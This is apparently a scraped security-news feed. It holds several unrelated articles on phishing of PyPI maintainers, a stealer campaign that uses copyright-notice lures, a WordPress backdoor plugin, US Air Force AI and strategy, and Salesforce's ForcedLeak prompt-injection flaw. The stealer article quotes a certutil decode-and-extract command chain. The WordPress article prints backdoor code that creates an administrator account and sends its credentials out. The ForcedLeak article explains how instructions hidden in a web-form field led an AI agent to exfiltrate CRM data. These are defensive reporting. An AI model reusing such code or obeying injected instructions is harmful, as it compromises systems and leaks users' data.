• A sophisticated phishing campaign has emerged targeting maintainers of packages on the Python Package Index (PyPI), employing domain confusion tactics to steal authentication credentials from unsuspecting developers.

    The attack leverages fraudulent emails designed to mimic official PyPI communications, directing recipients to malicious domains that closely resemble the legitimate PyPI infrastructure.

    The phishing operation utilizes carefully crafted emails that request users to “verify their email address” for supposed “account maintenance and security procedures,” warning that accounts may face suspension without immediate action.

    These deceptive messages create a sense of urgency, compelling maintainers to act quickly without scrutinizing the legitimacy of the communication.

    The fraudulent emails direct users to the malicious domain pypi-mirror.org, which masquerades as an official PyPI mirror but is entirely unaffiliated with the Python Software Foundation.

    This campaign represents a continuation of similar attacks that have targeted PyPI and other open-source repositories over recent months, with threat actors systematically rotating domain names to evade detection and takedown efforts.

    PyPI.org analysts identified this as part of a broader pattern of domain-confusion attacks specifically designed to exploit the trust relationships within the open-source ecosystem.

    The attack operates through a combination of social engineering and technical deception, exploiting the inherent trust that developers place in official-looking communications from package repositories.

    When victims click the malicious link, they are directed to a convincing replica of the PyPI login interface hosted on the fraudulent domain, where any entered credentials are immediately harvested by the attackers.

    Domain Confusion and Infrastructure Deception

    The technical foundation of this phishing campaign relies heavily on domain spoofing techniques that exploit subtle visual similarities to legitimate PyPI infrastructure.

    The attackers registered pypi-mirror.org to capitalize on the common practice of package repositories maintaining mirror sites for redundancy and geographic distribution.

    This naming convention appears legitimate to users familiar with mirror architectures commonly employed by major software repositories.

    The malicious domain employs HTTPS encryption and professional web design elements to enhance its credibility, making visual detection challenging for users who may be accessing the site quickly or on mobile devices.

    The fraudulent site replicates PyPI’s login interface with remarkable precision, including proper styling, logos, and form elements that mirror the authentic experience.

    This level of sophistication suggests significant planning and resources dedicated to maximizing the campaign’s success rate.

    PyPI security teams have responded by coordinating with domain registrars and content delivery networks to expedite takedown procedures while simultaneously submitting malicious domains to threat intelligence feeds used by major browsers for phishing protection.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post New Phishing Attack Targeting PyPI Maintainers to Steal Login Credentials appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A sophisticated malware campaign orchestrated by the Vietnamese Lone None threat actor group has been leveraging fraudulent copyright infringement takedown notices to deploy information-stealing malware onto unsuspecting victims’ systems.

    The campaign, which has been actively tracked since November 2024, represents a concerning evolution in social engineering tactics that exploits legitimate legal concerns to bypass traditional security awareness measures.

    The malicious operation centers around spoofed email communications that impersonate various legal firms from around the world, claiming copyright violations on victims’ Facebook pages or websites.

    A sample Copyright-themed campaign email containing an embedded link to a Python Installer (Source – Cofense)

    These carefully crafted emails reference real Facebook accounts belonging to the recipients, adding an alarming level of authenticity that increases the likelihood of successful deception.

    The threat actors have demonstrated remarkable linguistic versatility, creating email templates in at least ten different languages including English, French, German, Korean, Chinese, and Thai, likely utilizing machine translation tools to expand their global reach.

    The execution flowchart for the average Lone None Stealer sample (Source – Cofense)

    Cofense analysts identified this campaign as particularly dangerous due to its delivery of two primary malware payloads: Pure Logs Stealer and a newly discovered information stealer dubbed Lone None Stealer, also known as PXA Stealer.

    The campaign’s sophistication extends beyond traditional malware distribution, employing novel techniques such as using Telegram bot profiles to store payload URLs and leveraging legitimate programs like Haihaisoft PDF Reader to evade detection mechanisms.

    The attack chain begins with victims receiving copyright takedown emails containing embedded links that redirect through URL shortening services like tr.ee and goo.su before ultimately leading to file-sharing platforms such as Dropbox and MediaFire.

    These archive files contain a mixture of legitimate documents alongside malicious components, creating a facade of authenticity while hiding the true malicious intent.

    Advanced Infection Mechanism and Payload Delivery

    The technical execution of this malware campaign demonstrates remarkable sophistication in its multi-stage infection process.

    Upon clicking the malicious link, victims download an archive file containing a legitimate program, typically Haihaisoft PDF Reader, which has been maliciously repurposed to load a malicious DLL functioning as a Python installer.

    The infection chain progresses through a carefully orchestrated sequence of legitimate Windows utilities to decode and execute the final payload.

    The malicious DLL exploits the built-in Windows utility certutil.exe, originally designed for certificate management, to decode an archive file that masquerades as a PDF document but contains the actual malware components.

    The following command demonstrates this technique:-

    cmd /c cd _ && start Document.pdf && certutil -decode Document.pdf Invoice.pdf && images.png x -ibck -y Invoice.pdf C:\\Users\\Public

    Following successful decoding, the campaign utilizes a bundled WinRAR executable, deceptively named “images.png,” to extract the decoded archive contents to the C:\Users\Public directory.

    This location choice is strategic, as it provides write access without requiring administrative privileges while maintaining persistence across user sessions.

    The extracted Python installation includes a malicious interpreter executable named “svchost.exe” that executes obfuscated Python scripts designed to establish communication with Telegram bot command and control infrastructure.

    The malware achieves persistence through Windows registry modifications, specifically creating startup entries in HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run to ensure continued execution after system reboots.

    The execution flowchart for ATR 378532 (Source – Cofense)

    The complete execution flowchart for the average Lone None Stealer sample, demonstrating the complex multi-stage process from initial infection through final payload deployment.

    The execution flowchart for ATR 377263 (Source – Cofense)

    The campaign’s use of Telegram bots as both payload delivery mechanisms and command-and-control infrastructure represents a significant tactical evolution, allowing threat actors to maintain operational security while leveraging legitimate communication platforms to avoid traditional network detection methods.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post Threat Actors Using Copyright Takedown Claims to Deploy Malware appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A sophisticated malware campaign targeting WordPress websites has been discovered employing advanced steganographic techniques and persistent backdoor mechanisms to maintain unauthorized administrator access.

    The malware operates through two primary components that work in tandem to create a resilient attack infrastructure, enabling cybercriminals to establish persistent footholds on compromised websites while remaining undetected by traditional security measures.

    The attack begins with the deployment of malicious files designed to masquerade as legitimate WordPress components.

    These files employ multiple layers of obfuscation and encoding to avoid detection, creating administrator accounts with hardcoded credentials that attackers can use to maintain access even after initial security breaches are discovered.

    The malware’s architecture demonstrates a sophisticated understanding of WordPress’s internal mechanisms, exploiting both plugin infrastructure and core user management functions to establish persistent access points.

    Beyond simple account creation, the malware implements advanced communication protocols with command-and-control servers, automatically transmitting compromised credentials and system information to attacker-controlled endpoints.

    This enables threat actors to harvest administrative access credentials across multiple compromised sites simultaneously, creating extensive networks of compromised WordPress installations.

    Sucuri analysts identified the malware during routine security cleanups and observed its sophisticated persistence mechanisms that actively resist removal attempts.

    The malware’s impact extends beyond simple unauthorized access, potentially enabling attackers to inject malicious content, redirect visitors to fraudulent websites, harvest sensitive information, or deploy additional malicious payloads.

    The combination of stealth tactics and persistent mechanisms makes this campaign particularly dangerous for website owners who may remain unaware of the compromise for extended periods while attackers maintain silent access to their systems.

    Advanced Persistence and Stealth Mechanisms

    The malware demonstrates exceptional sophistication in its persistence tactics, employing a dual-file approach that ensures redundant access pathways.

    DebugMaster.php (Source – Sucuri)

    The primary component disguises itself as the “DebugMaster Pro” plugin, complete with convincing metadata including version numbers, GitHub repositories, and professional descriptions.

    However, beneath this facade lies heavily obfuscated code designed to create administrator accounts and establish communication channels with external servers.

    public function create_admin_user() {
    if (get_option($this->init_flag, false)) return;
    $creds = $this->generate_credentials();
    if (!username_exists($creds["user"])) {
    $user_id = wp_create_user($creds["user"], $creds["pass"], $creds["email"]);
    if (!is_wp_error($user_id)) {
    $user = new WP_User($user_id);
    $user->set_role("administrator");
    }
    }
    $this->send_credentials($creds);
    update_option($this->init_flag, time() + 86400 * 30);
    }

    The malware implements multiple evasion techniques to avoid detection by both automated security tools and manual inspection.

    It actively removes itself from WordPress plugin listings using filtered queries and obscures administrative user accounts from standard user management interfaces.

    Malicious Scripts (Source – Sucuri)

    The code utilizes extensive hexadecimal encoding and goto statements to obfuscate its true functionality, making static analysis considerably more challenging for security researchers.

    Additionally, the malware incorporates IP tracking mechanisms to identify administrator access patterns while simultaneously whitelisting known administrative IP addresses to avoid exposing malicious functionality to legitimate users.

    This selective visibility ensures that the malware remains hidden from website owners while continuing to operate against regular visitors, demonstrating a sophisticated understanding of operational security principles typically associated with advanced persistent threat groups.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post Hackers Exploiting WordPress Websites With Silent Malware to Gain Admin Access appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • NATIONAL HARBOR, Md.—The Air Force is eager to use AI widely but is still struggling with the infrastructure to make it all work, said the service’s top buyer for battle-network systems.

    “One of my biggest challenges is the underlying infrastructure that actually makes it all work,” said Maj. Gen. Luke Cropsey, the Air Force’s program executive officer for command, control, communications, and battle management, or C3BM, during the Air and Space Forces Association’s Air, Space & Cyber conference. “It's just the hard network of figuring out: how do you get the right infrastructure where you need it?” 

    Interoperability—whether data sharing or linking between systems—remains a challenge. 

    “With all the different configurations of stacks that are running around out there, getting to an enterprise-level capability is tough,” Cropsey told reporters. “As part of where we're trying to in our ‘26 priorities, we're actually looking at how do we build an enterprise battle network, [an] enterprise-wide set of strategies that allows us to go from however many disparate systems are out there today into some rational number of end-to-end capabilities that will allow us to get to the speed and the scale that we need.”

    Technical teams are currently developing drafts of those strategies, which will fit under C3BM’s strategic framework announced in July.  The Air Force released a separate network modernization document earlier this month.

    “As we go into the fall timeframe, we're going to take those initial internal documents and strategies and start proliferating them out to the rest of the department to get their inputs and then ultimately out for comment to the broader industry base that provides that capability back into us, so that we have a robust strategy around what that end state looks like,” Cropsey said. 

    But even the best algorithms need good data and management practices to back them up. 

    “We really struggle, I think, with data integrity and being able to integrate our data…And I think that we go into things with good intentions, we look for [commercial-off-the-shelf] solutions to use, but then we personalize things to the degree that we just can't get there to integrate,” said Maj. Gen. Michele Edmondson, Air Force deputy chief of staff for warfighter communications and cyber systems. “And from an A6 perspective, if we can't get the data right, there are so many things that we just won't be able to do to support Gen. Cropsey in his endeavor. So we've got to focus more on the data piece.”

    ]]>

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • NATIONAL HARBOR, Md.—Three words have dominated the conversation at the Air & Space Force Association’s Air, Space and Cyber Conference near Washington D.C. in recent years: “China, China, China.”

    That phrase, frequently repeated by former Air Force Secretary Frank Kendall, was used to footstomp the need for increased funding and focus on major defense programs. Building drone wingmen, unveiling a long-range nuclear bomber and developing plans for the next-generation fighter jet were viewed as necessities to compete with near-peer threats—namely, China’s rapidly-developing military capabilities. 

    But at the conference this week, past messaging about the yearslong push for great power competition was replaced with frequent mentions of new administration priorities. And the ongoing multi-billion dollar modernization efforts received a new justification: they are now crucial to the new focus of President Donald Trump and Defense Secretary Pete Hegseth: defending the homeland and its hemisphere. 

    Air Force Secretary Troy Meink, who took office four months ago, said the service can take on the wide variety of missions the new administration has spotlighted.

    “Homeland defense pretty much captures all threats,” Meink told reporters Monday. “Pretty much covers everything in the systems that we need to do. We have to make sure that we cover that whole spectrum of threats to the country. There's massive overlap in what we need to defend the homeland from the China-level threat, as we do in being able to protect some of our partners and allies overseas.”

    Defense policy experts and military insiders, however, were alarmed—in part by the unclear guidance on which missions should be prioritized. More importantly, they wondered if there would be enough funding to cover the wide range of national security priorities highlighted by the new administration, from “Golden Dome” missile defense to conflicts with alleged narco-terrorism organizations.

    "All of the services, including the Air Force, are missing the clear strategic guidance needed to make essential prioritization decisions as they reach the end game of the budget process and try to chart an organizational path forward,” a former defense official said. 

    While the former official attributed that to the lack of a National Defense Strategy, which is historically released in the fall, they added it also shows a lack of clear and united messaging from the military on what must be prioritized.

    “What will be interesting to see is how definitive the new strategic guidance is; how much it shapes next year's budget; and how consistent leadership is in aligning resources to strategy once it is signed,” the official added.

    Meink, once a KC-135 Stratotanker navigator and instructor who last served as principal deputy director of the National Reconnaissance Office, does not seem to want to follow in the footsteps of his predecessor—who often unveiled major policy goals and insights from the podium of the defense conference.

    In a 2022 keynote speech, Kendall debuted his seven operational imperatives: a list of priorities that served as a mission statement of sorts for the Department of the Air Force. In a 2024 speech at the conference, alongside Air Force Chief of Staff Gen. David Allvin and Chief of Space Operations Gen. Chance Saltzman, the then-Air Force secretary released a list of 24 efforts and goals focused on “reoptimizing for Great Power Competition.”

    While Meink’s keynote address did directly mention China several times and highlighted the military’s rapid pace of development, he also hedged his bets.

    “It’s not just against China either. The president’s priorities: defend the homeland and maintain our dominance against all adversaries, particularly China.” Meink said. “Whether it’s the terrorist groups, whether it’s a full up China, we have to defend, we have to be innovative against all of those activities.”

    Todd Harrison, a senior fellow at the American Enterprise Institute focused on defense budgeting, said taking on China and supporting the homeland require two very different strategies.

    “You don’t project power to defend the homeland,” Harrison said. “If you want to deter China, you have to be able to project power, and that’s very different than having your forces home and having the type of capabilities that are just intended to operate behind the moat.”

    When asked by reporters where he stood on the outstanding reoptimization efforts left on Kendall’s list, Meink said he hadn’t made any final calls on them.

    “You don't make organizational changes when you first come to the job,” Meink said, later adding “I know we're getting close” to making decisions.

    And when asked if he would have his own strategic vision, Meink offered little insight.

    “I think a lot of the ideas that have been floated around, regardless where they came from, are important, right? I take a little bit of a different approach to that,” Meink said. “I'll be honest, I'm not a big believer in the competition side of the house … you need to be able to win. Period.”

    This year, defense spending saw a major influx of cash through the one-time reconciliation bill passed by Congress. It’s not clear if such funding would pass again. Meink acknowledged that trade offs might be necessary with some of the administration’s priorities.

    “Money's always a challenge, and we're doing the trade-offs to support that entire range of missions,” Meink said. “There are always trade-offs.”

    As the Department of the Air Force’s top civilian weighs those priorities, questions loom over who will be the next top uniformed leaders of the service. 

    Allvin very suddenly announced his retirement last month—marking the shortest tenure of an Air Force chief of staff since the 1990s and the latest casualty in a Pentagon leadership shakeup since Trump took office. Sources told Defense One general was replaced due to his focus on Kendall’s past reoptimization efforts.

    When asked about the status of a replacement, Meink provided little detail but said he was confident they would find a suitable successor.

    “We're not going to not have a chief,” Meink said. “In the end, that has to work through the administration, but the bottom line is, we will not not have a chief. Gen. Allvin and I will make sure that we have a chief.”

    ]]>

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Living Security, a global leader in Human Risk Management (HRM), today announced the full speaker lineup for the Human Risk Management Conference (HRMCon 2025), taking place October 20, 2025, at Austin’s Q2 Stadium and virtually worldwide. The announcement follows findings from the newly published 2025 State of Human Cyber Risk Report, produced by the Cyentia […]

    The post Living Security Unveils HRMCon 2025 Speakers as Report Finds Firms Detect Just 19% of Human Risk appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Living Security, a global leader in Human Risk Management (HRM), today announced the full speaker lineup for the Human Risk Management Conference (HRMCon 2025), taking place October 20, 2025, at Austin’s Q2 Stadium and virtually worldwide.

    The announcement follows findings from the newly published 2025 State of Human Cyber Risk Report, produced by the Cyentia Institute in collaboration with Living Security, which reveals that on average, organizations detect only 19% of all human risk activity. That means the majority of risky behaviors — from credential misuse to insider threats — go unseen, leaving enterprises exposed to risks that technology or traditional awareness programs alone can’t solve.

    HRMCon is a one-day event focused on the people side of cybersecurity, offered this year both in-person in Austin and virtually worldwide. The program is designed for CISOs, security leaders, risk managers, and HR professionals who are responsible for building security culture and reducing human-driven risk. Sessions will explore how to extend risk ownership beyond traditional awareness programs and the security operations center, empowering managers and employees across the business to take accountability. Attendees will gain practical strategies they can apply immediately from executives, global analysts, and peers. Participants with confirmed attendance may also request a completion certificate for Continuing Professional Education (CPE) credits for the full conference.

    “Most organizations remain blind to the majority of human-driven risk, leaving gaps that technology or traditional awareness programs alone can’t solve,” said Ashley Rose, CEO and Co-Founder of Living Security. “Closing that visibility gap requires new strategies, proven frameworks, and collaboration across functions — which is exactly what HRMCon is designed to deliver. No matter where you are in your HRM journey, you’ll walk away with practical playbooks, proven strategies, and inspiring stories you can apply immediately. This isn’t just another security event—it’s a launchpad for making human risk a managed business function, all without pulling you away from your day-to-day responsibilities.”

    HRMCon 2025 will feature enterprise CISOs, Fortune 500 veterans, and leading analysts sharing research-backed strategies and real-world lessons on operationalizing human risk management.

    Speaker Highlights

    Opening Keynote – Brett Wahlin, CISO, Aurora – From Counterintelligence to Cybersecurity: Rethinking the Human Factor Across Industries.

    Risk frameworks have shaped enterprise security for decades but often overlook the human element. Drawing on his path from counterintelligence to the CISO seat, Brett Wahlin will show where traditional frameworks succeed, where they fall short, and how Human Risk Management can integrate people into the same disciplined approach that governs technology.

    Tim Taylor, VP of Security Education and Awareness, Mastercard – Creating Human Risk Visibility: Where to Start and How to Scale.

    Tim offers a step-by-step play for creating measurable human risk visibility in 90 days. Attendees will learn how to define goals, connect data sources, and build momentum toward sustainable risk reduction.

    Ashley Atiles, Director of Identity Risk, & Alfonso Mancuso, Director of Information Security, Labcorp – The Access Equation: Identity Meets Human Risk.

    Ashley and Alfonso will explore how identity and behavior intersect as the earliest line of defense. Attendees will learn how integrating IAM signals with human risk data creates a powerful new lever for stopping threats before they escalate.

    Kelly Harward, VP of Product & Mike Siegel, President, Living Security – Operationalizing HRM: From Frameworks and Playbooks to Goals for Adaptive Defense.

    Living Security leaders show how to translate frameworks into measurable outcomes. Attendees will see real-world playbooks and a preview of the new Goals feature, which ties behavior change directly to risk reduction.

    Jinan Budge, VP & Principal Analyst, Forrester – The Future of Human Risk Management: Market Landscape and the Role of Agentic AI.

    A market-level view of how Human Risk Management is evolving from compliance to strategy. Attendees will learn about the current state of the market, where it’s headed, and how autonomous AI agents are set to reshape HRM strategies in the years ahead.

    Closing Keynote – Larry Whiteside Jr., CISO Advisor & Co-Founder, Confide – Evolving the Role of the CISO: From Defense to Business Enabler.

    A concise look at how the CISO role is shifting from technical defense to strategic business leadership. Attendees will hear how Human Risk Management can help CISOs align security with culture, accountability, and measurable business outcomes.

    HRMCon 2025 Features

    • Grounded in Research: Learning real-world strategies to close the 19% human risk visibility gap.
    • Professional Development: Earning verifiable CPE credits with a completion certificate (confirmed attendance and upon request).
    • Free and Flexible: Registering at no cost and choose to attending live in Austin or virtually from anywhere.
    • Expert-Led: Hearing from leading CISOs, analysts, and security practitioners shaping the HRM market.
    • Peer Insights: Seeing how organizations are operationalizing HRM through case studies and playbooks.
    • Immediate Takeaways: Leaving with frameworks, tools, and strategies you can implement right away.

    HRMCon 2025, hosted by Living Security, comes at a pivotal time for organizations looking to transform security culture, reduce human-driven risk, and lead in an AI-enabled world.

    Users can register today at www.livingsecurity.com/hrmcon-2025

    About Living Security

    Living Security is the global leader in Human Risk Management (HRM), providing a risk-informed approach that meets organizations where they are—whether that’s starting with AI-based phishing simulations, intelligent behavior-based training, or implementing a full HRM strategy that correlates behavior, identity, and threat data streams.

    Living Security’s Unify platform delivers 3X more visibility into human risk than traditional, compliance-based training platforms by eliminating siloed data and integrating across the security ecosystem. The platform pinpoints the 8–12% of users who pose the greatest risk and automates targeted interventions in real time—reducing exposure to human risk by over 90%. Powered by AI, human analysis, and industry-wide threat telemetry, Unify transforms fragmented signals into intelligent, adaptive defense.

    Named a Global Leader in Human Risk Management by Forrester and trusted by enterprises like Unilever, Mastercard, Merck, and Abbott Labs, Living Security helps security teams move from awareness to action—driving measurable behavior change and proving impact at every stage of the journey.

    Contact

    Living Security Media
    media@livingsecurity.com

    The post Living Security Unveils HRMCon 2025 Speakers as Report Finds Firms Detect Just 19% of Human Risk appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Cisco is urging customers to patch two security flaws impacting the VPN web server of Cisco Secure Firewall Adaptive Security Appliance (ASA) Software and Cisco Secure Firewall Threat Defense (FTD) Software, which it said have been exploited in the wild. The zero-day vulnerabilities in question are listed below – CVE-2025-20333 (CVSS score: 9.9) – An improper validation of user-supplied input

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • The threat actor known as Vane Viper has been outed as a purveyor of malicious ad technology (adtech), while relying on a tangled web of shell companies and opaque ownership structures to deliberately evade responsibility. “Vane Viper has provided core infrastructure in widespread malvertising, ad fraud, and cyberthreat proliferation for at least a decade,” Infoblox said in a technical report

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A critical vulnerability chain in Salesforce’s Agentforce AI platform, which could have allowed external attackers to steal sensitive CRM data.

    The vulnerability, dubbed ForcedLeak by Noma Labs, which discovered it, carries a CVSS score of 9.4 and was executed through a sophisticated indirect prompt injection attack.

    This discovery highlights the expanded and fundamentally different attack surface presented by autonomous AI agents compared to traditional systems.

    Upon notification from Noma Labs, Salesforce promptly investigated the issue and has since deployed patches. The fix prevents Agentforce agents from sending data to untrusted URLs, addressing the immediate risk.

    The research demonstrates how AI agents can be compromised through malicious instructions hidden within what are normally considered trusted data sources.

    ForcedLeak Attack

    The attack exploited several weaknesses, including insufficient context validation, overly permissive AI model behavior, and a critical Content Security Policy (CSP) bypass.

    Attackers could create a malicious Web-to-Lead submission containing unauthorized commands. When the AI agent processed this lead, the Large Language Model (LLM) treated the malicious instructions as legitimate, leading to the exfiltration of sensitive data.

    The LLM was unable to differentiate between trusted data loaded into its context and the attacker’s embedded instructions.

    The attack vector was an indirect prompt injection. Unlike a direct injection, where an attacker inputs commands straight into the AI, this method involves embedding malicious instructions in data that the AI will later process during a routine task.

    In this case, the attacker placed a payload in the “Description” field of a web form, which was then stored in the CRM. When an employee asked the AI agent to review the lead, the agent executed the hidden commands.

    A key factor in the success of this attack was the discovery of a flaw in Salesforce’s Content Security Policy. The researchers found that the domain my-salesforce-cms.com was whitelisted but had expired and was available for purchase.

    By acquiring this domain, an attacker could establish a trusted channel for data exfiltration. The AI agent, following its instructions, would send sensitive data to this attacker-controlled domain, bypassing security controls that would normally block such actions, Noma Labs said.

    Salesforce has since re-secured the expired domain and implemented stricter security controls, including Trusted URLs Enforcement for both Agentforce and Einstein AI, to prevent similar issues.

    If exploited, ForcedLeak could have had severe consequences. The vulnerability risked exposing confidential customer contact information, sales pipeline data, internal communications, and historical interaction records.

    Any organization using Salesforce Agentforce with the Web-to-Lead feature enabled was potentially vulnerable, especially those in sales and marketing who regularly process external lead data.

    Salesforce recommends that customers take the following actions:

    • Apply the recommended updates to enforce Trusted URLs for Agentforce and Einstein AI.
    • Audit existing lead data for any suspicious submissions containing unusual instructions.
    • Implement strict input validation and sanitize all data from untrusted sources.

    Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

      The post Salesforce AI Agent Vulnerability Allows Let Attackers Exfiltration Sensitive Data appeared first on Cyber Security News.

      ¶¶¶¶¶

      ¶¶¶¶¶

      ¶¶¶¶¶

      ¶¶¶¶¶

      ¶¶¶¶¶